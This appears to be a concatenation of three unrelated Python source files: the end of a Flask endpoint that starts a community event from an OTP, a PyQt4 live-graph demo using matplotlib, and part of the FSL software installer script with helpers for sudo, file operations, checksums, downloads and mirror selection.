elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
latitude_ = float(latitude_)
longitude_ = float(longitude_)
communityId_ = holdedQuery.communityId
# check if user has that community registered under him/her and is Authorized
userId = decode_auth_token(token)
userEmail_ = Users.query.get(userId).userEmail
communityRegistered = [x.communityId for x in Communities.query.filter_by(userId=userId).all()]
if communityId_ not in communityRegistered:
payLoad = {
'message': 'You-Are-Not-Registered-as-Community-Head-for-this-company'
}
return make_response(jsonify(payLoad), 403)
creation_date_ = otp_check.creation_date
userEmail_ = otp_check.userEmail
otp_ = otpNumber
event_name_ = otp_check.event_name
event_description_ = otp_check.event_description
ending_time_delta_ = otp_check.ending_time_delta
location_range_ = otp_check.location_range
broadcast_choice_ = otp_check.broadcast_choice
communityId_ = otp_check.communityId
new_event = Events(creation_date= creation_date_, userEmail=userEmail_, \
otp=otp_, event_name=event_name_, event_description=event_description_, \
ending_time_delta=ending_time_delta_, location_range=location_range_, \
latitude=latitude_, longitude=longitude_, broadcast_choice=broadcast_choice_, \
communityId=communityId_)
db.session.add(new_event)
HoldedEvents.query.filter_by(otp=otpNumber).delete()
db.session.commit()
payLoad = {
'OTP': otp_,
'EventName': event_name_,
'EndingInMin': ending_time_delta_,
'CommunityId': communityId_,
'EventStarted': True,
'BroadcastChoice': broadcast_choice_,
'LocationValidInMeters': location_range_
}
return make_response(payLoad, 200)
return make_response(payLoad, 400)
|
live_graph_3.py | ###################################################################
# #
# PLOTTING A LIVE GRAPH #
# ---------------------------- #
# EMBED A MATPLOTLIB ANIMATION INSIDE YOUR #
# OWN GUI! #
# #
###################################################################
import sys
import os
from PyQt4 import QtGui
from PyQt4 import QtCore
import functools
import numpy as np
import random as rd
import matplotlib
matplotlib.use("Qt4Agg")
from matplotlib.figure import Figure
from matplotlib.animation import TimedAnimation
from matplotlib.lines import Line2D
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
import time
import threading
def setCustomSize(x, width, height):
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(x.sizePolicy().hasHeightForWidth())
x.setSizePolicy(sizePolicy)
x.setMinimumSize(QtCore.QSize(width, height))
x.setMaximumSize(QtCore.QSize(width, height))
''''''
class CustomMainWindow(QtGui.QMainWindow):
def __init__(self):
super(CustomMainWindow, self).__init__()
# Define the geometry of the main window
self.setGeometry(300, 300, 800, 400)
self.setWindowTitle("my first window")
# Create FRAME_A
self.FRAME_A = QtGui.QFrame(self)
self.FRAME_A.setStyleSheet("QWidget { background-color: %s }" % QtGui.QColor(210,210,235,255).name())
self.LAYOUT_A = QtGui.QGridLayout()
self.FRAME_A.setLayout(self.LAYOUT_A)
self.setCentralWidget(self.FRAME_A)
# Place the zoom button
self.zoomBtn = QtGui.QPushButton(text = 'zoom')
setCustomSize(self.zoomBtn, 100, 50)
self.zoomBtn.clicked.connect(self.zoomBtnAction)
self.LAYOUT_A.addWidget(self.zoomBtn, *(0,0))
# Place the matplotlib figure
self.myFig = CustomFigCanvas()
self.LAYOUT_A.addWidget(self.myFig, *(0,1))
# Add the callbackfunc to ..
myDataLoop = threading.Thread(name = 'myDataLoop', target = dataSendLoop, daemon = True, args = (self.addData_callbackFunc,))
myDataLoop.start()
self.show()
''''''
def zoomBtnAction(self):
print("zoom in")
self.myFig.zoomIn(5)
''''''
def addData_callbackFunc(self, value):
# print("Add data: " + str(value))
self.myFig.addData(value)
''' End Class '''
class CustomFigCanvas(FigureCanvas, TimedAnimation):
def __init__(self):
self.addedData = []
print(matplotlib.__version__)
# The data
self.xlim = 200
self.n = np.linspace(0, self.xlim - 1, self.xlim)
a = []
b = []
a.append(2.0)
a.append(4.0)
a.append(2.0)
b.append(4.0)
b.append(3.0)
b.append(4.0)
self.y = (self.n * 0.0) + 50
# The window
self.fig = Figure(figsize=(5,5), dpi=100)
self.ax1 = self.fig.add_subplot(111)
# self.ax1 settings
self.ax1.set_xlabel('time')
self.ax1.set_ylabel('raw data')
self.line1 = Line2D([], [], color='blue')
self.line1_tail = Line2D([], [], color='red', linewidth=2)
self.line1_head = Line2D([], [], color='red', marker='o', markeredgecolor='r')
self.ax1.add_line(self.line1)
self.ax1.add_line(self.line1_tail)
self.ax1.add_line(self.line1_head)
self.ax1.set_xlim(0, self.xlim - 1)
self.ax1.set_ylim(0, 100)
FigureCanvas.__init__(self, self.fig)
TimedAnimation.__init__(self, self.fig, interval = 50, blit = True)
def new_frame_seq(self):
return iter(range(self.n.size))
def _init_draw(self):
lines = [self.line1, self.line1_tail, self.line1_head]
for l in lines:
l.set_data([], [])
def addData(self, value):
self.addedData.append(value)
def zoomIn(self, value):
bottom = self.ax1.get_ylim()[0]
top = self.ax1.get_ylim()[1]
bottom += value
top -= value
self.ax1.set_ylim(bottom,top)
self.draw()
def _step(self, *args):
# Extends the _step() method for the TimedAnimation class.
try:
TimedAnimation._step(self, *args)
except Exception as e:
self.abc += 1
print(str(self.abc))
TimedAnimation._stop(self)
pass
def _draw_frame(self, framedata):
margin = 2
while(len(self.addedData) > 0):
self.y = np.roll(self.y, -1)
self.y[-1] = self.addedData[0]
del(self.addedData[0])
self.line1.set_data(self.n[ 0 : self.n.size - margin ], self.y[ 0 : self.n.size - margin ])
self.line1_tail.set_data(np.append(self.n[-10:-1 - margin], self.n[-1 - margin]), np.append(self.y[-10:-1 - margin], self.y[-1 - margin]))
self.line1_head.set_data(self.n[-1 - margin], self.y[-1 - margin])
self._drawn_artists = [self.line1, self.line1_tail, self.line1_head]
''' End Class '''
# You need to setup a signal slot mechanism, to
# send data to your GUI in a thread-safe way.
# Believe me, if you don't do this right, things
# go very very wrong..
class Communicate(QtCore.QObject):
data_signal = QtCore.pyqtSignal(float)
''' End Class '''
def dataSendLoop(addData_callbackFunc):
# Setup the signal-slot mechanism.
mySrc = Communicate()
mySrc.data_signal.connect(addData_callbackFunc)
# Simulate some data
n = np.linspace(0, 499, 500)
y = 50 + 25*(np.sin(n / 8.3)) + 10*(np.sin(n / 7.5)) - 5*(np.sin(n / 1.5))
i = 0
while(True):
if(i > 499):
i = 0
time.sleep(0.1)
mySrc.data_signal.emit(y[i]) # <- Here you emit a signal!
i += 1
###
###
if __name__== '__main__':
app = QtGui.QApplication(sys.argv)
QtGui.QApplication.setStyle(QtGui.QStyleFactory.create('Plastique'))
myGUI = CustomMainWindow()
sys.exit(app.exec_())
|
fslinstaller.py | #!/usr/bin/python
# Handle unicode encoding
import csv
import errno
import getpass
import itertools
import locale
import os
import platform
import threading
import time
import shlex
import socket
import sys
import tempfile
import urllib2
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
from re import compile, escape, sub
from subprocess import Popen, call, PIPE, STDOUT
try:
from subprocess import DEVNULL # py3k
except ImportError:
DEVNULL = open(os.devnull, 'wb')
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
try:
import json
HAS_JSON = True
except Exception:
HAS_JSON = False
fsli_C_FAILED = 1
fsli_C_OK = 2
fsli_C_SKIP = 4
fsli_C_WARN = 3
CURRENT = 0
UPDATE = 1
UPGRADE = 2
BOURNE_SHELLS = ('sh', 'bash', 'zsh', 'ksh', 'dash', )
C_SHELLS = ('csh', 'tcsh', )
class Version(object):
def __init__(self, version_string):
if ':' in version_string:
version_string = version_string.split(':')[0]
v_vals = version_string.split('.')
for v in v_vals:
if not v.isdigit():
raise ValueError('Bad version string')
self.major = int(v_vals[0])
try:
self.minor = int(v_vals[1])
except IndexError:
self.minor = 0
try:
self.patch = int(v_vals[2])
except IndexError:
self.patch = 0
try:
self.hotfix = int(v_vals[3])
except IndexError:
self.hotfix = 0
def __repr__(self):
return "Version(%s,%s,%s,%s)" % (
self.major,
self.minor,
self.patch,
self.hotfix)
def __str__(self):
if self.hotfix == 0:
return "%s.%s.%s" % (self.major, self.minor, self.patch)
else:
return "%s.%s.%s.%s" % (
self.major,
self.minor,
self.patch,
self.hotfix)
def __ge__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self > other or self == other:
return True
return False
def __le__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self < other or self == other:
return True
return False
def __cmp__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.__lt__(other):
return -1
if self.__gt__(other):
return 1
return 0
def __lt__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.major < other.major:
return True
if self.major > other.major:
return False
if self.minor < other.minor:
return True
if self.minor > other.minor:
return False
if self.patch < other.patch:
return True
if self.patch > other.patch:
return False
if self.hotfix < other.hotfix:
return True
if self.hotfix > other.hotfix:
return False
# major, minor and patch all match so this is not less than
return False
def __gt__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.major > other.major:
return True
if self.major < other.major:
return False
if self.minor > other.minor:
return True
if self.minor < other.minor:
return False
if self.patch > other.patch:
return True
if self.patch < other.patch:
return False
if self.hotfix > other.hotfix:
return True
if self.hotfix < other.hotfix:
return False
# major, minor and patch all match so this is not less than
return False
def __eq__(self, other):
if not isinstance(other, Version):
return NotImplemented
if (
self.major == other.major and
self.minor == other.minor and
self.patch == other.patch and
self.hotfix == other.hotfix):
return True
return False
def __ne__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.__eq__(other):
return False
return True
version = Version('3.0.18')
def memoize(f):
cache = f.cache = {}
def g(*args, **kwargs):
key = (f, tuple(args), frozenset(kwargs.items()))
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return g
class InstallError(Exception):
pass
class shell_colours(object):
default = '\033[0m'
rfg_kbg = '\033[91m'
gfg_kbg = '\033[92m'
yfg_kbg = '\033[93m'
mfg_kbg = '\033[95m'
yfg_bbg = '\033[104;93m'
bfg_kbg = '\033[34m'
bold = '\033[1m'
class MsgUser(object):
__debug = False
__quiet = False
@classmethod
def debugOn(cls):
cls.__debug = True
@classmethod
def debugOff(cls):
cls.__debug = False
@classmethod
def quietOn(cls):
cls.__quiet = True
@classmethod
def quietOff(cls):
cls.__quiet = False
@classmethod
def isquiet(cls):
return cls.__quiet
@classmethod
def isdebug(cls):
return cls.__debug
@classmethod
def debug(cls, message, newline=True):
if cls.__debug:
mess = str(message)
if newline:
mess += "\n"
sys.stderr.write(mess)
@classmethod
def message(cls, msg):
if cls.__quiet:
return
print msg
@classmethod
def question(cls, msg):
print msg,
@classmethod
def skipped(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.mfg_kbg, "[Skipped] ", shell_colours.default, msg))
@classmethod
def ok(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.gfg_kbg, "[OK] ", shell_colours.default, msg))
@classmethod
def failed(cls, msg):
print "".join(
(shell_colours.rfg_kbg, "[FAILED] ", shell_colours.default, msg))
@classmethod
def warning(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.bfg_kbg,
shell_colours.bold,
"[Warning]",
shell_colours.default, " ", msg))
class Progress_bar(object):
def __init__(self, x=0, y=0, mx=1, numeric=False, percentage=False):
self.x = x
self.y = y
self.width = 50
self.current = 0
self.max = mx
self.numeric = numeric
self.percentage = percentage
def update(self, reading):
if MsgUser.isquiet():
return
percent = int(round(reading * 100.0 / self.max))
cr = '\r'
if not self.numeric and not self.percentage:
bar = '#' * int(percent)
elif self.numeric:
bar = "/".join(
(str(reading),
str(self.max))) + ' - ' + str(percent) + "%\033[K"
elif self.percentage:
bar = "%s%%" % (percent)
sys.stdout.write(cr)
sys.stdout.write(bar)
sys.stdout.flush()
self.current = percent
if percent == 100:
sys.stdout.write(cr)
if not self.numeric and not self.percentage:
sys.stdout.write(" " * int(percent))
sys.stdout.write(cr)
sys.stdout.flush()
elif self.numeric:
sys.stdout.write(" " * (len(str(self.max))*2 + 8))
sys.stdout.write(cr)
sys.stdout.flush()
elif self.percentage:
sys.stdout.write("100%")
sys.stdout.write(cr)
sys.stdout.flush()
def temp_file_name(mode='r', close=False):
'''Return a name for a temporary file - uses mkstemp to create the file and
returns a tuple (file object, file name).
Opens as read-only unless mode specifies otherwise. If close is set to True
will close the file before returning.
The file object is a fdopen file object so lacks a useable file name.'''
(tmpfile, fname) = tempfile.mkstemp()
file_obj = os.fdopen(tmpfile, mode)
if close:
file_obj.close()
return (file_obj, fname)
class RunCommandError(Exception):
pass
class Spinner(object):
spinner = itertools.cycle(('-', '\\', '|', '/', ))
busy = False
delay = 0.2
def __init__(self, delay=None, quiet=False):
if delay:
try:
self.delay = float(delay)
except ValueError:
pass
self.quiet = quiet
def spin_it(self):
while self.busy:
sys.stdout.write(self.spinner.next())
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
if not self.quiet:
self.busy = True
threading.Thread(target=self.spin_it).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
def run_cmd_dropstdout(command, as_root=False):
'''Run the command and return result.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
else:
sudo_pwd = ''
try:
my_spinner = Spinner(quiet=MsgUser.isquiet())
my_spinner.start()
cmd = Popen(command_line, stdin=PIPE, stdout=None, stderr=PIPE)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
(_, error) = cmd.communicate()
except Exception:
raise
finally:
my_spinner.stop()
if cmd.returncode:
MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
raise RunCommandError(error)
def run_cmd(command, as_root=False):
'''Run the command and return result.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
else:
sudo_pwd = ''
MsgUser.debug("Will call %s" % (command_line))
try:
my_spinner = Spinner(quiet=MsgUser.isquiet())
my_spinner.start()
cmd = Popen(command_line, stdin=PIPE, stdout=PIPE, stderr=PIPE)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
(output, error) = cmd.communicate()
except Exception:
raise
finally:
my_spinner.stop()
if cmd.returncode:
MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
raise RunCommandError(error)
MsgUser.debug("Command completed successfully (%s)" % (output))
return output
def run_cmd_displayoutput(command, as_root=False):
'''Run the command and display output.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
MsgUser.debug("Will call %s" % (command_line))
cmd = Popen(
command_line,
stdin=PIPE, stdout=sys.stdout, stderr=sys.stderr)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
cmd.communicate()
return_code = cmd.returncode
else:
return_code = call(command_line)
if return_code:
MsgUser.debug("An error occured (%s)" % (return_code))
raise RunCommandError(return_code)
MsgUser.debug("Command completed successfully")
def check_sudo(sudo_pwd):
command_line = ['sudo', '-S', 'true']
MsgUser.debug("Checking sudo password")
cmd = Popen(
command_line,
stdin=PIPE,
stdout=DEVNULL,
stderr=DEVNULL
)
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
cmd.communicate()
if cmd.returncode != 0:
return False
else:
return True
class SudoPasswordError(Exception):
pass
@memoize
def get_sudo_pwd():
'''Get the sudo password from the user'''
MsgUser.message("We require your password to continue...")
attempts = 0
valid = False
while attempts < 3 and not valid:
sudo_pwd = getpass.getpass('password: ')
valid = check_sudo(sudo_pwd)
if not valid:
MsgUser.failed("Incorrect password")
attempts += 1
if not valid:
raise SudoPasswordError()
return sudo_pwd
class DeletionRefused(Exception):
pass
class SafeDeleteError(Exception):
pass
def safe_delete(fs_object, as_root=False):
'''Delete file/folder, becoming root if necessary.
Run some sanity checks on object'''
banned_items = ['/', '/usr', '/usr/bin', '/usr/local', '/bin',
'/sbin', '/opt', '/Library', '/System', '/System/Library',
'/var', '/tmp', '/var/tmp', '/lib', '/lib64', '/Users',
'/home', '/Applications', '/private', '/etc', '/dev',
'/Network', '/net', '/proc']
if os.path.isdir(fs_object):
del_opts = "-rf"
else:
del_opts = '-f'
if fs_object in banned_items:
raise DeletionRefused('Will not delete %s!' % (fs_object))
command_line = " ".join(('rm', del_opts, fs_object))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise SafeDeleteError(str(e))
return result
class MoveError(Exception):
pass
def move(source, target, as_root):
try:
run_cmd_dropstdout(" ".join(('mv', source, target)), as_root)
except RunCommandError, e:
raise MoveError(str(e))
class IsDirectoryError(Exception):
pass
class CopyFileError(Exception):
pass
def copy_file(fname, destination, as_root):
'''Copy a file using sudo if necessary'''
MsgUser.debug("Copying %s to %s (as root? %s)" % (
fname, destination, as_root))
if os.path.isdir(fname):
raise IsDirectoryError('Source (%s) is a director!' % (fname))
if os.path.isdir(destination):
# Ensure that copying into a folder we have a terminating slash
destination = destination.rstrip('/') + "/"
copy_opts = '-p'
command_line = " ".join(('cp', copy_opts, fname, destination))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise CopyFileError(str(e))
return result
def file_contains(fname, search_for):
'''Equivalent of grep'''
regex = compile(escape(search_for))
found = False
MsgUser.debug("In file_contains.")
MsgUser.debug("Looking for %s in %s." % (search_for, fname))
f = open(fname, 'r')
for l in f:
if regex.search(l):
found = True
break
f.close()
return found
def file_contains_1stline(fname, search_for):
'''Equivalent of grep - returns first occurrence'''
regex = compile(escape(search_for))
found = ''
MsgUser.debug("In file_contains_1stline.")
MsgUser.debug("Looking for %s in %s." % (search_for, fname))
f = open(fname, 'r')
for l in f:
if regex.search(l):
found = l
break
f.close()
return found
def line_string_replace(line, search_for, replace_with):
return sub(escape(search_for), escape(replace_with), line)
def line_starts_replace(line, search_for, replace_with):
if line.startswith(search_for):
return replace_with + '\n'
return line
class MoveFileError(Exception):
pass
def move_file(from_file, to_file, requires_root=False):
'''Move a file, using /bin/cp via sudo if requested.
Will work around known bugs in python.'''
if requires_root:
try:
run_cmd_dropstdout(" ".join(
("/bin/cp", from_file, to_file)), as_root=True)
except RunCommandError, e:
MsgUser.debug(e)
raise MoveFileError("Failed to move %s (%s)" % (from_file, str(e)))
os.remove(from_file)
else:
try:
move(from_file, to_file, requires_root)
except OSError, e:
# Handle bug in some python versions on OS X writing to NFS home
# folders, Python tries to preserve file flags but NFS can't do
# this. It fails to catch this error and ends up leaving the file
# in the original and new locations!
if e.errno == 45:
# Check if new file has been created:
if os.path.isfile(to_file):
# Check if original exists
if os.path.isfile(from_file):
# Destroy original and continue
os.remove(from_file)
else:
try:
run_cmd_dropstdout("/bin/cp %s %s" % (
from_file, to_file), as_root=False)
except RunCommandError, e:
MsgUser.debug(e)
raise MoveFileError("Failed to copy from %s (%s)" % (
from_file, str(e)))
os.remove(from_file)
else:
raise
except Exception:
raise
class EditFileError(Exception):
pass
def edit_file(fname, edit_function, search_for, replace_with, requires_root):
'''Search for a simple string in the file given and replace
it with the new text'''
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
src = open(fname)
for line in src:
line = edit_function(line, search_for, replace_with)
tmpfile.write(line)
src.close()
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except MoveFileError, e:
MsgUser.debug(e)
os.remove(tmpfname)
raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
MsgUser.debug("Modified %s (search %s; replace %s)." % (
fname, search_for, replace_with))
class AddToFileError(Exception):
pass
def add_to_file(fname, add_lines, requires_root):
'''Add lines to end of a file'''
if isinstance(add_lines, basestring):
add_lines = add_lines.split('\n')
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
src = open(fname)
for line in src:
tmpfile.write(line)
src.close()
tmpfile.write('\n')
for line in add_lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except MoveFileError, e:
os.remove(tmpfname)
MsgUser.debug(e)
raise AddToFileError("Failed to add to file %s (%s)" % (
fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror + tmpfname + fname)
raise AddToFileError("Failed to add to file %s" % (fname))
MsgUser.debug("Modified %s (added %s)" % (fname, '\n'.join(add_lines)))
class CreateFileError(Exception):
pass
def create_file(fname, lines, requires_root):
'''Create a new file containing lines given'''
if isinstance(lines, basestring):
lines = lines.split('\n')
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
for line in lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except CreateFileError, e:
os.remove(tmpfname)
MsgUser.debug(e)
raise CreateFileError("Failed to edit %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise CreateFileError("Failed to create %s" % (fname))
MsgUser.debug("Created %s (added %s)" % (fname, '\n'.join(lines)))
class UnsupportedOs(Exception):
pass
class Host(object):
'''Work out which platform we are running on'''
o_s = platform.system().lower()
arch = platform.machine()
applever = ''
os_type = os.name
supported = True
if o_s == 'darwin':
vendor = 'apple'
version = Version(platform.release())
(applever, _, _) = platform.mac_ver()
glibc = ''
elif o_s == 'linux':
if hasattr(platform, 'linux_distribution'):
# We have a modern python (>2.4)
(vendor, version, _) = platform.linux_distribution(
full_distribution_name=0)
else:
(vendor, version, _) = platform.dist()
vendor = vendor.lower()
version = Version(version)
glibc = platform.libc_ver()[1]
else:
supported = False
if arch == 'x86_64':
bits = '64'
elif arch == 'i686':
bits = '32'
elif arch == 'Power Macintosh':
bits = ''
def is_writeable(location):
'''Check if we can write to the location given'''
writeable = True
try:
tfile = tempfile.NamedTemporaryFile(mode='w+b', dir=location)
tfile.close()
except OSError, e:
if e.errno == errno.EACCES or e.errno == errno.EPERM:
writeable = False
else:
raise
return writeable
def is_writeable_as_root(location):
'''Check if sudo can write to a given location'''
# This requires us to use sudo
(f, fname) = temp_file_name(mode='w')
f.write("FSL")
f.close()
result = False
tmptarget = '/'.join((location, os.path.basename(fname)))
MsgUser.debug(" ".join(('/bin/cp', fname, tmptarget)))
try:
run_cmd_dropstdout(" ".join(('/bin/cp',
fname, tmptarget)), as_root=True)
result = True
os.remove(fname)
run_cmd_dropstdout(" ".join(('/bin/rm',
'-f', tmptarget)), as_root=True)
except RunCommandError, e:
MsgUser.debug(e)
os.remove(fname)
result = False
MsgUser.debug("Writeable as root? %s" % (result))
return result
class ChecksumCalcError(Exception):
pass
def sha256File(filename, bs=1048576):
'''Returns the sha256 sum of the given file.'''
MsgUser.message("Checking FSL package")
try:
import hashlib
f = open(filename, 'rb')
pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
pb.position = 0
fhash = hashlib.sha256()
data = f.read(bs)
while len(data) == bs:
fhash.update(data)
data = f.read(bs)
pb.position += len(data)
pb.update(pb.position)
fhash.update(data)
f.close()
return fhash.hexdigest()
except ImportError:
# No SHA256 support on python pre-2.5 so call the OS to do it.
try:
result = run_cmd(" ".join(('sha256sum', '-b', filename)))
return parsesha256sumfile(result)
except RunCommandError, e:
MsgUser.debug("SHA256 calculation error %s" % (str(e)))
raise ChecksumCalcError
def parsesha256sumfile(sha256string):
'''Returns sha256 sum extracted from the output of sha256sum or shasum -a
256 from OS X/Linux platforms'''
(sha256, _) = sha256string.split("*")
return sha256.strip()
def md5File(filename, bs=1048576):
'''Returns the MD5 sum of the given file.'''
MsgUser.message("Checking FSL package")
try:
import hashlib
fhash = hashlib.md5()
except ImportError:
import md5
fhash = md5.new()
f = open(filename, 'rb')
pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
pb.position = 0
data = f.read(bs)
while len(data) == bs:
fhash.update(data)
data = f.read(bs)
pb.position += len(data)
pb.update(pb.position)
fhash.update(data)
f.close()
return fhash.hexdigest()
def file_checksum(filename, chktype='sha256'):
if chktype == 'sha256':
return sha256File(filename)
if chktype == 'md5':
return md5File(filename)
else:
raise ChecksumCalcError('Unrecognised checksum type')
class OpenUrlError(Exception):
pass
def open_url(url, start=0, timeout=20):
socket.setdefaulttimeout(timeout)
MsgUser.debug("Attempting to download %s." % (url))
try:
req = urllib2.Request(url)
if start != 0:
req.headers['Range'] = 'bytes=%s-' % (start)
rf = urllib2.urlopen(req)
except urllib2.HTTPError, e:
MsgUser.debug("%s %s" % (url, e.msg))
raise OpenUrlError("Cannot find file %s on server (%s). "
"Try again later." % (url, e.msg))
except urllib2.URLError, e:
if type(e.reason) != str:
errno = e.reason.args[0]
if len(e.reason.args) > 1:
message = e.reason.args[1]
# give up on trying to identify both the errno and message
else:
message = e.reason.args
if errno == 8:
# Bad host name
MsgUser.debug("%s %s" % (url,
"Unable to find FSL download "
"server in the DNS"))
else:
# Other error
MsgUser.debug("%s %s" % (url, message))
else:
message = str(e.reason)
raise OpenUrlError(
"Cannot find %s (%s). Try again later." % (url, message))
except socket.timeout, e:
MsgUser.debug(e)
raise OpenUrlError("Failed to contact FSL web site. Try again later.")
return rf
class DownloadFileError(Exception):
pass
def download_file(url, localf, timeout=20):
'''Get a file from the url given storing it in the local file specified'''
try:
rf = open_url(url, 0, timeout)
except OpenUrlError, e:
raise DownloadFileError(str(e))
metadata = rf.info()
rf_size = int(metadata.getheaders("Content-Length")[0])
dl_size = 0
block = 16384
x = 0
y = 0
pb = Progress_bar(x, y, rf_size, numeric=True)
for attempt in range(1, 6):
# Attempt download 5 times before giving up
pause = timeout
try:
try:
lf = open(localf, 'ab')
except Exception:
raise DownloadFileError("Failed to create temporary file.")
while True:
buf = rf.read(block)
if not buf:
break
dl_size += len(buf)
lf.write(buf)
pb.update(dl_size)
lf.close()
except (IOError, socket.timeout), e:
MsgUser.debug(e.strerror)
MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
pause = 0
if dl_size != rf_size:
time.sleep(pause)
MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
try:
rf = open_url(url, dl_size, timeout)
except OpenUrlError, e:
MsgUser.debug(e)
else:
break
if dl_size != rf_size:
raise DownloadFileError("Failed to download file.")
def build_url_with_protocol(protocol, base, parts):
part_l = [protocol + '://' + base.strip('/')]
part_l.extend([x.strip('/') for x in parts])
return '/'.join(part_l)
def build_url(parts):
part_l = [parts[0].strip('/')]
part_l.extend([x.strip('/') for x in parts[1:]])
return '/'.join(part_l)
class SiteNotResponding(Exception):
pass
def fastest_mirror(main_mirrors, mirrors_file, timeout=20):
'''Find the fastest mirror for FSL downloads.'''
MsgUser.debug("Calculating fastest mirror")
socket.setdefaulttimeout(timeout)
# Get the mirror list from the url
fastestmirrors = {}
mirrorlist = []
for m in main_mirrors:
MsgUser.debug("Trying %s" % (m))
m_url = '/'.join((m.strip('/'), mirrors_file))
MsgUser.debug("Attempting to open %s" % (m_url))
try:
response = urllib2.urlopen(url=m_url)
except urllib2.HTTPError, e:
MsgUser.debug("%s %s" % (m_url, e.msg))
raise SiteNotResponding(e.msg)
except urllib2.URLError, e:
if isinstance(e.reason, socket.timeout):
MsgUser.debug("Time out trying %s" % (m_url))
raise SiteNotResponding(m)
else:
MsgUser.debug(str(e.reason))
raise SiteNotResponding(str(e.reason))
except socket.timeout, e:
MsgUser.debug(e)
raise SiteNotResponding(str(e))
except Exception, e:
MsgUser.debug("Unhandled exception %s" % (str(e)))
raise
else:
mirrorlist = response.read().strip().split('\n')
MsgUser.debug("Received the following "
"mirror list %s" % (mirrorlist))
continue
if len(mirrorlist) == 0:
raise ServerFailure("Cannot find FSL download servers")
# Check timings from the urls specified
if len(mirrorlist) > 1:
for mirror in mirrorlist:
MsgUser.debug("Trying %s" % (mirror))
then = time.time()
if mirror.startswith('http:'):
serverport = 80
elif mirror.startswith('https:'):
serverport = 443
else:
raise ServerFailure("Unrecognised protocol")
try:
mysock = socket.create_connection((mirror, serverport),
timeout)
pingtime = time.time() - then
mysock.close()
fastestmirrors[pingtime] = mirror
MsgUser.debug("Mirror responded in %s seconds" % (pingtime))
except socket.gaierror, e:
MsgUser.debug("%s can't be resolved" % (e))
except socket.timeout, e:
MsgUser.debug(e)
if len(fastestmirrors) == 0:
raise ServerFailure('Failed to contact any FSL download sites.')
download_url = fastestmirrors[min(fastestmirrors.keys())]
else:
download_url = mirrorlist[0]
return download_url
# Concept:
# Web app creates the following files:
# fslmirrorlist.txt - contains a list of mirror urls
# fslreleases.json - contains the available maps for oses
# mapping to a download url
# {'installer' {
# 'filename': 'fslinstaller.py',
# 'version': '3.0.0',
# 'date': '02/03/2017',
# 'checksum_type', 'sha256',
# 'checksum'},
# 'linux' : {
# 'centos' : {
# 'x86_64': {
# '6': {
# '5.0.9': {
# 'filename': 'fsl-5.0.9-centos6_64.tar.gz',
# 'version': '5.0.9',
# 'date': '01/02/2017',
# 'checksum_type', 'sha256',
# 'checksum': 'abf645662bcf4453235',
# },
# },
# },
# },
# 'rhel' : {'alias': 'centos'}},
# 'apple' : {
# 'darwin' : {
# 'x86_64': {
# '11': {
# ....
# },
# }
@memoize
def get_web_manifest(download_url, timeout=20):
'''Download the FSL manifest from download_url'''
socket.setdefaulttimeout(timeout)
MsgUser.debug("Looking for manifest at %s." % (download_url))
if HAS_JSON:
MsgUser.debug("Downloading JSON file")
return get_json(download_url + Settings.manifest_json)
else:
MsgUser.debug("Downloading CSV file")
return get_csv_dict(download_url + Settings.manifest_csv)
